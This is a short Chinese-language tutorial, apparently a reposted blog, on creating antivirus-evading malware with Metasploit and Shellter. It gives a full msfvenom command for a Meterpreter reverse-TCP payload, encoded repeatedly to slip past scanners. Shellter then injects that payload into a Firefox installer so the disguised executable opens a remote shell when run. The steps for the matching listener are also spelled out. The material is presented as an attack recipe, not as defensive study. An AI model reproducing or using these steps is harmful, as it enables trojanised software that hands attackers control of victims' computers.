使用Metasploit&Shellter 捆绑免杀
Shellter是一个动态的shellcode注入工具。它可用于将shellcode捆绑注入本机Windows应用
Shellter
Shellter是一个动态的shellcode注入工具。它可用于将shellcode捆绑注入本机Windows应用程序(仅限于32位应用程序)。shellcode也可以通过Metasploit生成的payload免杀。
准备
- 使用kali linux
- 安装 shellter
apt install shellter或者 官网下载
1.使用Metasploit生成 payload
使用Metasploit&Shellter 捆绑免杀 黑帽艺术 第1张
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=1337 -e x86/shikata_ga_nai -i 43 -f raw -o fud.raw
2.使用Shellter选择捆绑exe文件
- 目录下放置一个32位的exe程序,我以Firefox-latest.exe 为例
使用Metasploit&Shellter 捆绑免杀 黑帽艺术 第2张
3.把 fud.raw 注入到exe程序
使用Metasploit&Shellter 捆绑免杀 黑帽艺术 第3张
4.启动Metasploit监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
set lport 1337
exploit* 启动监听之后,把目录下的 Firefox-latest.exe 文件放置 windows 电脑下运行即可主机上线
- 杀毒引擎扫描结果
使用Metasploit&Shellter 捆绑免杀 黑帽艺术 第4张
本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2018-06-295,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录